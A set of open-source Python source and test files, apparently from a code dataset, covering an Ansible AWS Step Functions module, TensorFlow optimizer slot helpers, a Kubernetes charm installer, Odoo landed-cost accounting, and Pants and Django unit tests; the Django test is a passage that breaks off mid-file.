apollo13/ansible | test/support/integration/plugins/modules/aws_step_functions_state_machine_execution.py | 27 | 6479 | #!/usr/bin/python
# Copyright (c) 2019, Prasad Katti (@prasadkatti)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: aws_step_functions_state_machine_execution
short_description: Start or stop execution of an AWS Step Functions state machine.
version_added: "2.10"
description:
- Start or stop execution of a state machine in AWS Step Functions.
options:
action:
description: Desired action (start or stop) for a state machine execution.
default: start
choices: [ start, stop ]
type: str
name:
description: Name of the execution.
type: str
execution_input:
description: The JSON input data for the execution.
type: json
default: {}
state_machine_arn:
description: The ARN of the state machine that will be executed.
type: str
execution_arn:
description: The ARN of the execution you wish to stop.
type: str
cause:
description: A detailed explanation of the cause for stopping the execution.
type: str
default: ''
error:
description: The error code of the failure to pass in when stopping the execution.
type: str
default: ''
extends_documentation_fragment:
- aws
- ec2
author:
- Prasad Katti (@prasadkatti)
'''
EXAMPLES = '''
- name: Start an execution of a state machine
aws_step_functions_state_machine_execution:
name: an_execution_name
execution_input: '{ "IsHelloWorldExample": true }'
state_machine_arn: "arn:aws:states:us-west-2:682285639423:stateMachine:HelloWorldStateMachine"
- name: Stop an execution of a state machine
aws_step_functions_state_machine_execution:
action: stop
execution_arn: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
cause: "cause of task failure"
error: "error code of the failure"
'''
RETURN = '''
execution_arn:
description: ARN of the AWS Step Functions state machine execution.
type: str
returned: if action == start and changed == True
sample: "arn:aws:states:us-west-2:682285639423:execution:HelloWorldStateMachineCopy:a1e8e2b5-5dfe-d40e-d9e3-6201061047c8"
start_date:
description: The date the execution is started.
type: str
returned: if action == start and changed == True
sample: "2019-11-02T22:39:49.071000-07:00"
stop_date:
description: The date the execution is stopped.
type: str
returned: if action == stop
sample: "2019-11-02T22:39:49.071000-07:00"
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import camel_dict_to_snake_dict
try:
from botocore.exceptions import ClientError, BotoCoreError
except ImportError:
pass # caught by AnsibleAWSModule
def start_execution(module, sfn_client):
'''
start_execution uses the execution name to determine whether a previous execution already exists.
If an execution with the provided name exists, client.start_execution will not be called.
'''
state_machine_arn = module.params.get('state_machine_arn')
name = module.params.get('name')
execution_input = module.params.get('execution_input')
try:
# list_executions is eventually consistent
page_iterators = sfn_client.get_paginator('list_executions').paginate(stateMachineArn=state_machine_arn)
for execution in page_iterators.build_full_result()['executions']:
if name == execution['name']:
check_mode(module, msg='State machine execution already exists.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be started.', changed=True)
res_execution = sfn_client.start_execution(
stateMachineArn=state_machine_arn,
name=name,
input=execution_input
)
except (ClientError, BotoCoreError) as e:
if e.response['Error']['Code'] == 'ExecutionAlreadyExists':
# this will never be executed anymore
module.exit_json(changed=False)
module.fail_json_aws(e, msg="Failed to start execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res_execution))
def stop_execution(module, sfn_client):
cause = module.params.get('cause')
error = module.params.get('error')
execution_arn = module.params.get('execution_arn')
try:
# describe_execution is eventually consistent
execution_status = sfn_client.describe_execution(executionArn=execution_arn)['status']
if execution_status != 'RUNNING':
check_mode(module, msg='State machine execution is not running.', changed=False)
module.exit_json(changed=False)
check_mode(module, msg='State machine execution would be stopped.', changed=True)
res = sfn_client.stop_execution(
executionArn=execution_arn,
cause=cause,
error=error
)
except (ClientError, BotoCoreError) as e:
module.fail_json_aws(e, msg="Failed to stop execution.")
module.exit_json(changed=True, **camel_dict_to_snake_dict(res))
def check_mode(module, msg='', changed=False):
if module.check_mode:
module.exit_json(changed=changed, output=msg)
def main():
module_args = dict(
action=dict(choices=['start', 'stop'], default='start'),
name=dict(type='str'),
execution_input=dict(type='json', default={}),
state_machine_arn=dict(type='str'),
cause=dict(type='str', default=''),
error=dict(type='str', default=''),
execution_arn=dict(type='str')
)
module = AnsibleAWSModule(
argument_spec=module_args,
required_if=[('action', 'start', ['name', 'state_machine_arn']),
('action', 'stop', ['execution_arn']),
],
supports_check_mode=True
)
sfn_client = module.client('stepfunctions')
action = module.params.get('action')
if action == "start":
start_execution(module, sfn_client)
else:
stop_execution(module, sfn_client)
if __name__ == '__main__':
main()
| gpl-3.0 |
nburn42/tensorflow | tensorflow/python/training/slot_creator.py | 16 | 7900 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Standard functions for creating slots.
A slot is a `Variable` created with the same shape as a primary variable or
`Tensor`. A slot is always scoped in the namespace of the primary object and
typically has the same device and type.
Slots are typically used as accumulators to track values associated with
the primary object:
```python
# Optimizers can create a slot for each variable to track accumulators
accumulators = {var : create_zeros_slot(var, "momentum") for var in vs}
for var in vs:
apply_momentum(var, accumulators[var], lr, grad, momentum_tensor)
# Slots can also be used for moving averages
mavg = create_slot(var, var.initialized_value(), "exponential_moving_avg")
update_mavg = mavg.assign_sub((mavg - var) * (1 - decay))
```
"""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.eager import context
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.training import distribute as distribute_lib
def _create_slot_var(primary, val, scope, validate_shape, shape, dtype):
"""Helper function for creating a slot variable."""
# TODO(lukaszkaiser): Consider allowing partitioners to be set in the current
# scope.
current_partitioner = variable_scope.get_variable_scope().partitioner
variable_scope.get_variable_scope().set_partitioner(None)
# When initializing from val instead of a callable initializer, the shape
# is expected to be None, not <unknown> or any fully defined shape.
shape = shape if callable(val) else None
slot = variable_scope.get_variable(
scope, initializer=val, trainable=False,
use_resource=resource_variable_ops.is_resource_variable(primary),
shape=shape, dtype=dtype,
validate_shape=validate_shape)
variable_scope.get_variable_scope().set_partitioner(current_partitioner)
# pylint: disable=protected-access
if isinstance(primary, variables.Variable) and primary._save_slice_info:
# Primary is a partitioned variable, so we need to also indicate that
# the slot is a partitioned variable. Slots have the same partitioning
# as their primaries.
# For examples when using AdamOptimizer in linear model, slot.name
# here can be "linear//weights/Adam:0", while primary.op.name is
# "linear//weight". We want to get 'Adam' as real_slot_name, so we
# remove "'linear//weight' + '/'" and ':0'.
real_slot_name = slot.name[len(primary.op.name + "/"):-2]
slice_info = primary._save_slice_info
slot._set_save_slice_info(variables.Variable.SaveSliceInfo(
slice_info.full_name + "/" + real_slot_name,
slice_info.full_shape[:],
slice_info.var_offset[:],
slice_info.var_shape[:]))
# pylint: enable=protected-access
return slot
def create_slot(primary, val, name, colocate_with_primary=True):
"""Create a slot initialized to the given value.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
val: A `Tensor` specifying the initial value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = val.get_shape().is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, val, "", validate_shape, None, None)
else:
return _create_slot_var(primary, val, "", validate_shape, None, None)
def create_slot_with_initializer(primary, initializer, shape, dtype, name,
colocate_with_primary=True):
"""Creates a slot initialized using an `Initializer`.
The type of the slot is determined by the given value.
Args:
primary: The primary `Variable` or `Tensor`.
initializer: An `Initializer`. The initial value of the slot.
shape: Shape of the initial value of the slot.
dtype: Type of the value of the slot.
name: Name to use for the slot variable.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
# Scope the slot name in the namespace of the primary variable.
# Set "primary.op.name + '/' + name" as default name, so the scope name of
# optimizer can be shared when reuse is True. Meanwhile when reuse is False
# and the same name has been previously used, the scope name will add '_N'
# as suffix for unique identifications.
validate_shape = shape.is_fully_defined()
if context.executing_eagerly():
prefix = primary._shared_name # pylint: disable=protected-access
else:
prefix = primary.op.name
with variable_scope.variable_scope(None, prefix + "/" + name):
if colocate_with_primary:
distribution_strategy = distribute_lib.get_distribution_strategy()
with distribution_strategy.colocate_vars_with(primary):
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
else:
return _create_slot_var(primary, initializer, "", validate_shape, shape,
dtype)
def create_zeros_slot(primary, name, dtype=None, colocate_with_primary=True):
"""Create a slot initialized to 0 with same shape as the primary object.
Args:
primary: The primary `Variable` or `Tensor`.
name: Name to use for the slot variable.
dtype: Type of the slot variable. Defaults to the type of `primary`.
colocate_with_primary: Boolean. If True the slot is located
on the same device as `primary`.
Returns:
A `Variable` object.
"""
if dtype is None:
dtype = primary.dtype
slot_shape = primary.get_shape()
if slot_shape.is_fully_defined():
initializer = init_ops.zeros_initializer(dtype)
return create_slot_with_initializer(
primary, initializer, slot_shape, dtype, name,
colocate_with_primary=colocate_with_primary)
else:
if isinstance(primary, variables.Variable):
slot_shape = array_ops.shape(primary.initialized_value())
else:
slot_shape = array_ops.shape(primary)
val = array_ops.zeros(slot_shape, dtype=dtype)
return create_slot(primary, val, name,
colocate_with_primary=colocate_with_primary)
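# Usage sketch (assumes `var` is an existing `tf.Variable`):
#
#   momentum = create_zeros_slot(var, "momentum")
#   # `momentum` is a non-trainable zero variable with var's shape and
#   # dtype, colocated with `var` (colocate_with_primary=True by default).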
| apache-2.0 |
qma/pants | tests/python/pants_test/java/jar/test_manifest.py | 33 | 1127 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import unittest
from pants.java.jar.manifest import Manifest
class TestManifest(unittest.TestCase):
def test_isempty(self):
manifest = Manifest()
self.assertTrue(manifest.is_empty())
manifest.addentry('Header', 'value')
self.assertFalse(manifest.is_empty())
def test_addentry(self):
manifest = Manifest()
manifest.addentry('Header', 'value')
self.assertEquals(
'Header: value\n', manifest.contents())
def test_too_long_entry(self):
manifest = Manifest()
with self.assertRaises(ValueError):
manifest.addentry(
'1234567890123456789012345678901234567890'
'12345678901234567890123456789', 'value')
def test_nonascii_char(self):
manifest = Manifest()
with self.assertRaises(UnicodeEncodeError):
manifest.addentry('X-Copyright', '© 2015')
| apache-2.0 |
mylons/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/kubernetes_installer.py | 149 | 4138 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import shlex
import subprocess
from path import Path
def run(command, shell=False):
""" A convience method for executing all the commands. """
print(command)
if shell is False:
command = shlex.split(command)
output = subprocess.check_output(command, shell=shell)
print(output)
return output
class KubernetesInstaller():
"""
This class contains the logic needed to install kubernetes binary files.
"""
def __init__(self, arch, version, output_dir):
""" Gather the required variables for the install. """
# The kubernetes-master charm needs certain commands to be aliased.
self.aliases = {'kube-apiserver': 'apiserver',
'kube-controller-manager': 'controller-manager',
'kube-proxy': 'kube-proxy',
'kube-scheduler': 'scheduler',
'kubectl': 'kubectl',
'kubelet': 'kubelet'}
self.arch = arch
self.version = version
self.output_dir = Path(output_dir)
def build(self, branch):
""" Build kubernetes from a github repository using the Makefile. """
# Remove any old build artifacts.
make_clean = 'make clean'
run(make_clean)
# Always checkout the master to get the latest repository information.
git_checkout_cmd = 'git checkout master'
run(git_checkout_cmd)
# When checking out a tag, delete the old branch (not master).
if branch != 'master':
git_drop_branch = 'git branch -D {0}'.format(self.version)
print(git_drop_branch)
rc = subprocess.call(git_drop_branch.split())
if rc != 0:
print('returned: %d' % rc)
# Make sure the git repository is up-to-date.
git_fetch = 'git fetch origin {0}'.format(branch)
run(git_fetch)
if branch == 'master':
git_reset = 'git reset --hard origin/master'
run(git_reset)
else:
# Checkout a branch of kubernetes so the repo is correct.
checkout = 'git checkout -b {0} {1}'.format(self.version, branch)
run(checkout)
# Create an environment with the path to the GO binaries included.
go_path = ('/usr/local/go/bin', os.environ.get('PATH', ''))
go_env = os.environ.copy()
go_env['PATH'] = ':'.join(go_path)
print(go_env['PATH'])
# Compile the binaries with the make command using the WHAT variable.
make_what = "make all WHAT='cmd/kube-apiserver cmd/kubectl "\
"cmd/kube-controller-manager plugin/cmd/kube-scheduler "\
"cmd/kubelet cmd/kube-proxy'"
print(make_what)
rc = subprocess.call(shlex.split(make_what), env=go_env)
def install(self, install_dir=Path('/usr/local/bin')):
""" Install kubernetes binary files from the output directory. """
if not install_dir.isdir():
install_dir.makedirs_p()
# Create the symbolic links to the real kubernetes binaries.
for key, value in self.aliases.iteritems():
target = self.output_dir / key
if target.exists():
link = install_dir / value
if link.exists():
link.remove()
target.symlink(link)
else:
print('Error target file {0} does not exist.'.format(target))
exit(1)
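# Usage sketch (arch, version and output directory are illustrative):
#   installer = KubernetesInstaller('amd64', 'v1.0.3',
#                                   '_output/local/bin/linux/amd64')
#   installer.build('master')  # run from within a kubernetes git checkout
#   installer.install()        # symlinks built binaries into /usr/local/bin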
| apache-2.0 |
ubiar/odoo | addons/stock_landed_costs/stock_landed_costs.py | 56 | 18361 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
import openerp.addons.decimal_precision as dp
from openerp.tools.translate import _
import product
class stock_landed_cost(osv.osv):
_name = 'stock.landed.cost'
_description = 'Stock Landed Cost'
_inherit = 'mail.thread'
_track = {
'state': {
'stock_landed_costs.mt_stock_landed_cost_open': lambda self, cr, uid, obj, ctx=None: obj['state'] == 'done',
},
}
def _total_amount(self, cr, uid, ids, name, args, context=None):
result = {}
for cost in self.browse(cr, uid, ids, context=context):
total = 0.0
for line in cost.cost_lines:
total += line.price_unit
result[cost.id] = total
return result
def _get_cost_line(self, cr, uid, ids, context=None):
cost_to_recompute = []
for line in self.pool.get('stock.landed.cost.lines').browse(cr, uid, ids, context=context):
cost_to_recompute.append(line.cost_id.id)
return cost_to_recompute
def get_valuation_lines(self, cr, uid, ids, picking_ids=None, context=None):
picking_obj = self.pool.get('stock.picking')
lines = []
if not picking_ids:
return lines
for picking in picking_obj.browse(cr, uid, picking_ids):
for move in picking.move_lines:
# It doesn't make sense to make a landed cost for a product that isn't set as being valuated in real time at real cost.
if move.product_id.valuation != 'real_time' or move.product_id.cost_method != 'real':
continue
total_cost = 0.0
total_qty = move.product_qty
weight = move.product_id and move.product_id.weight * move.product_qty
volume = move.product_id and move.product_id.volume * move.product_qty
for quant in move.quant_ids:
total_cost += quant.cost
vals = dict(product_id=move.product_id.id, move_id=move.id, quantity=move.product_uom_qty, former_cost=total_cost * total_qty, weight=weight, volume=volume)
lines.append(vals)
if not lines:
raise osv.except_osv(_('Error!'), _('The selected picking does not contain any move that would be impacted by landed costs. Landed costs are only possible for products configured in real time valuation with real price costing method. Please make sure it is the case, or you selected the correct picking'))
return lines
_columns = {
'name': fields.char('Name', track_visibility='always', readonly=True, copy=False),
'date': fields.date('Date', required=True, states={'done': [('readonly', True)]}, track_visibility='onchange', copy=False),
'picking_ids': fields.many2many('stock.picking', string='Pickings', states={'done': [('readonly', True)]}, copy=False),
'cost_lines': fields.one2many('stock.landed.cost.lines', 'cost_id', 'Cost Lines', states={'done': [('readonly', True)]}, copy=True),
'valuation_adjustment_lines': fields.one2many('stock.valuation.adjustment.lines', 'cost_id', 'Valuation Adjustments', states={'done': [('readonly', True)]}),
'description': fields.text('Item Description', states={'done': [('readonly', True)]}),
'amount_total': fields.function(_total_amount, type='float', string='Total', digits_compute=dp.get_precision('Account'),
store={
'stock.landed.cost': (lambda self, cr, uid, ids, c={}: ids, ['cost_lines'], 20),
'stock.landed.cost.lines': (_get_cost_line, ['price_unit', 'quantity', 'cost_id'], 20),
}, track_visibility='always'
),
'state': fields.selection([('draft', 'Draft'), ('done', 'Posted'), ('cancel', 'Cancelled')], 'State', readonly=True, track_visibility='onchange', copy=False),
'account_move_id': fields.many2one('account.move', 'Journal Entry', readonly=True, copy=False),
'account_journal_id': fields.many2one('account.journal', 'Account Journal', required=True),
}
_defaults = {
'name': lambda obj, cr, uid, context: obj.pool.get('ir.sequence').get(cr, uid, 'stock.landed.cost'),
'state': 'draft',
'date': fields.date.context_today,
}
def _create_accounting_entries(self, cr, uid, line, move_id, qty_out, context=None):
product_obj = self.pool.get('product.template')
cost_product = line.cost_line_id and line.cost_line_id.product_id
if not cost_product:
return False
accounts = product_obj.get_product_accounts(cr, uid, line.product_id.product_tmpl_id.id, context=context)
debit_account_id = accounts['property_stock_valuation_account_id']
already_out_account_id = accounts['stock_account_output']
credit_account_id = line.cost_line_id.account_id.id or cost_product.property_account_expense.id or cost_product.categ_id.property_account_expense_categ.id
if not credit_account_id:
raise osv.except_osv(_('Error!'), _('Please configure Stock Expense Account for product: %s.') % (cost_product.name))
return self._create_account_move_line(cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=context)
def _create_account_move_line(self, cr, uid, line, move_id, credit_account_id, debit_account_id, qty_out, already_out_account_id, context=None):
"""
Generate the account.move.line values to track the landed cost.
Afterwards, for the goods that are already out of stock, we should create the out moves
"""
aml_obj = self.pool.get('account.move.line')
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'debit': line.additional_landed_cost,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name,
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': line.quantity,
'credit': line.additional_landed_cost,
'account_id': credit_account_id
}, context=context)
#Create account move lines for quants already out of stock
if qty_out > 0:
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'credit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': debit_account_id
}, context=context)
aml_obj.create(cr, uid, {
'name': line.name + ": " + str(qty_out) + _(' already out'),
'move_id': move_id,
'product_id': line.product_id.id,
'quantity': qty_out,
'debit': line.additional_landed_cost * qty_out / line.quantity,
'account_id': already_out_account_id
}, context=context)
return True
def _create_account_move(self, cr, uid, cost, context=None):
vals = {
'journal_id': cost.account_journal_id.id,
'period_id': self.pool.get('account.period').find(cr, uid, cost.date, context=context)[0],
'date': cost.date,
'ref': cost.name
}
return self.pool.get('account.move').create(cr, uid, vals, context=context)
def _check_sum(self, cr, uid, landed_cost, context=None):
"""
Will check that, for each cost line, its valuation lines sum to the
correct amount, and that the overall total amount is also correct.
"""
costcor = {}
tot = 0
for valuation_line in landed_cost.valuation_adjustment_lines:
if costcor.get(valuation_line.cost_line_id):
costcor[valuation_line.cost_line_id] += valuation_line.additional_landed_cost
else:
costcor[valuation_line.cost_line_id] = valuation_line.additional_landed_cost
tot += valuation_line.additional_landed_cost
res = (tot == landed_cost.amount_total)
for costl in costcor.keys():
if costcor[costl] != costl.price_unit:
res = False
return res
def button_validate(self, cr, uid, ids, context=None):
quant_obj = self.pool.get('stock.quant')
for cost in self.browse(cr, uid, ids, context=context):
if not cost.valuation_adjustment_lines or not self._check_sum(cr, uid, cost, context=context):
raise osv.except_osv(_('Error!'), _('You cannot validate a landed cost which has no valid valuation lines.'))
move_id = self._create_account_move(cr, uid, cost, context=context)
quant_dict = {}
for line in cost.valuation_adjustment_lines:
if not line.move_id:
continue
per_unit = line.final_cost / line.quantity
diff = per_unit - line.former_cost_per_unit
quants = [quant for quant in line.move_id.quant_ids]
for quant in quants:
if quant.id not in quant_dict:
quant_dict[quant.id] = quant.cost + diff
else:
quant_dict[quant.id] += diff
for key, value in quant_dict.items():
quant_obj.write(cr, uid, key, {'cost': value}, context=context)
qty_out = 0
for quant in line.move_id.quant_ids:
if quant.location_id.usage != 'internal':
qty_out += quant.qty
self._create_accounting_entries(cr, uid, line, move_id, qty_out, context=context)
self.write(cr, uid, cost.id, {'state': 'done', 'account_move_id': move_id}, context=context)
return True
def button_cancel(self, cr, uid, ids, context=None):
self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
return True
def compute_landed_cost(self, cr, uid, ids, context=None):
line_obj = self.pool.get('stock.valuation.adjustment.lines')
unlink_ids = line_obj.search(cr, uid, [('cost_id', 'in', ids)], context=context)
line_obj.unlink(cr, uid, unlink_ids, context=context)
towrite_dict = {}
for cost in self.browse(cr, uid, ids, context=None):
if not cost.picking_ids:
continue
picking_ids = [p.id for p in cost.picking_ids]
total_qty = 0.0
total_cost = 0.0
total_weight = 0.0
total_volume = 0.0
total_line = 0.0
vals = self.get_valuation_lines(cr, uid, [cost.id], picking_ids=picking_ids, context=context)
for v in vals:
for line in cost.cost_lines:
v.update({'cost_id': cost.id, 'cost_line_id': line.id})
self.pool.get('stock.valuation.adjustment.lines').create(cr, uid, v, context=context)
total_qty += v.get('quantity', 0.0)
total_cost += v.get('former_cost', 0.0)
total_weight += v.get('weight', 0.0)
total_volume += v.get('volume', 0.0)
total_line += 1
for line in cost.cost_lines:
for valuation in cost.valuation_adjustment_lines:
value = 0.0
if valuation.cost_line_id and valuation.cost_line_id.id == line.id:
if line.split_method == 'by_quantity' and total_qty:
per_unit = (line.price_unit / total_qty)
value = valuation.quantity * per_unit
elif line.split_method == 'by_weight' and total_weight:
per_unit = (line.price_unit / total_weight)
value = valuation.weight * per_unit
elif line.split_method == 'by_volume' and total_volume:
per_unit = (line.price_unit / total_volume)
value = valuation.volume * per_unit
elif line.split_method == 'equal':
value = (line.price_unit / total_line)
elif line.split_method == 'by_current_cost_price' and total_cost:
per_unit = (line.price_unit / total_cost)
value = valuation.former_cost * per_unit
else:
value = (line.price_unit / total_line)
if valuation.id not in towrite_dict:
towrite_dict[valuation.id] = value
else:
towrite_dict[valuation.id] += value
if towrite_dict:
for key, value in towrite_dict.items():
line_obj.write(cr, uid, key, {'additional_landed_cost': value}, context=context)
return True
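# Worked split example (illustrative figures): a cost line of 90.0 with
# split_method 'by_quantity' spread over valuation lines of 1, 2 and 3
# units gives per_unit = 90.0 / 6 = 15.0, so the lines receive additional
# landed costs of 15.0, 30.0 and 45.0 respectively.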
class stock_landed_cost_lines(osv.osv):
_name = 'stock.landed.cost.lines'
_description = 'Stock Landed Cost Lines'
def onchange_product_id(self, cr, uid, ids, product_id=False, context=None):
result = {}
if not product_id:
return {'value': {'quantity': 0.0, 'price_unit': 0.0}}
product = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
result['name'] = product.name
result['split_method'] = product.split_method
result['price_unit'] = product.standard_price
result['account_id'] = product.property_account_expense and product.property_account_expense.id or product.categ_id.property_account_expense_categ.id
return {'value': result}
_columns = {
'name': fields.char('Description'),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'product_id': fields.many2one('product.product', 'Product', required=True),
'price_unit': fields.float('Cost', required=True, digits_compute=dp.get_precision('Product Price')),
'split_method': fields.selection(product.SPLIT_METHOD, string='Split Method', required=True),
'account_id': fields.many2one('account.account', 'Account', domain=[('type', '<>', 'view'), ('type', '<>', 'closed')]),
}
class stock_valuation_adjustment_lines(osv.osv):
_name = 'stock.valuation.adjustment.lines'
_description = 'Stock Valuation Adjustment Lines'
def _amount_final(self, cr, uid, ids, name, args, context=None):
result = {}
for line in self.browse(cr, uid, ids, context=context):
result[line.id] = {
'former_cost_per_unit': 0.0,
'final_cost': 0.0,
}
result[line.id]['former_cost_per_unit'] = (line.former_cost / line.quantity if line.quantity else 1.0)
result[line.id]['final_cost'] = (line.former_cost + line.additional_landed_cost)
return result
def _get_name(self, cr, uid, ids, name, arg, context=None):
res = {}
for line in self.browse(cr, uid, ids, context=context):
res[line.id] = line.product_id.code or line.product_id.name or ''
if line.cost_line_id:
res[line.id] += ' - ' + line.cost_line_id.name
return res
_columns = {
'name': fields.function(_get_name, type='char', string='Description', store=True),
'cost_id': fields.many2one('stock.landed.cost', 'Landed Cost', required=True, ondelete='cascade'),
'cost_line_id': fields.many2one('stock.landed.cost.lines', 'Cost Line', readonly=True),
'move_id': fields.many2one('stock.move', 'Stock Move', readonly=True),
'product_id': fields.many2one('product.product', 'Product', required=True),
'quantity': fields.float('Quantity', digits_compute=dp.get_precision('Product Unit of Measure'), required=True),
'weight': fields.float('Weight', digits_compute=dp.get_precision('Product Unit of Measure')),
'volume': fields.float('Volume', digits_compute=dp.get_precision('Product Unit of Measure')),
'former_cost': fields.float('Former Cost', digits_compute=dp.get_precision('Product Price')),
'former_cost_per_unit': fields.function(_amount_final, multi='cost', string='Former Cost(Per Unit)', type='float', digits_compute=dp.get_precision('Account'), store=True),
'additional_landed_cost': fields.float('Additional Landed Cost', digits_compute=dp.get_precision('Product Price')),
'final_cost': fields.function(_amount_final, multi='cost', string='Final Cost', type='float', digits_compute=dp.get_precision('Account'), store=True),
}
_defaults = {
'quantity': 1.0,
'weight': 1.0,
'volume': 1.0,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
jpshort/odoo | addons/l10n_at/__init__.py | 438 | 1050 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) conexus.at
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account_wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
titasakgm/brc-stock | openerp/addons/sale_crm/report/__init__.py | 54 | 1087 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sales_crm_account_invoice_report
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
nathanial/lettuce | tests/integration/lib/Django-1.3/tests/modeltests/get_object_or_404/tests.py | 92 | 2623 | from django.http import Http404
from django.shortcuts import get_object_or_404, get_list_or_404
from django.test import TestCase
from models import Author, Article
class GetObjectOr404Tests(TestCase):
def test_get_object_or_404(self):
a1 = Author.objects.create(name="Brave Sir Robin")
a2 = Author.objects.create(name="Patsy")
# No Articles yet, so we should get a Http404 error.
self.assertRaises(Http404, get_object_or_404, Article, title="Foo")
article = Article.objects.create(title="Run away!")
article.authors = [a1, a2]
# get_object_or_404 can be passed a Model to query.
self.assertEqual(
get_object_or_404(Article, title__contains="Run"),
article
)
# We can also use the Article manager through an Author object.
self.assertEqual(
get_object_or_404(a1.article_set, title__contains="Run"),
article
)
# No articles containing "Camelot". This should raise a Http404 error.
self.assertRaises(Http404,
get_object_or_404, a1.article_set, title__contains="Camelot"
)
# Custom managers can be used too.
self.assertEqual(
get_object_or_404(Article.by_a_sir, title="Run away!"),
article
)
# QuerySets can be used too.
self.assertEqual(
get_object_or_404(Article.objects.all(), title__contains="Run"),
article
)
# Just as when using a get() lookup, you will get an error if more than
# one object is returned.
self.assertRaises(Author.MultipleObjectsReturned,
get_object_or_404, Author.objects.all()
)
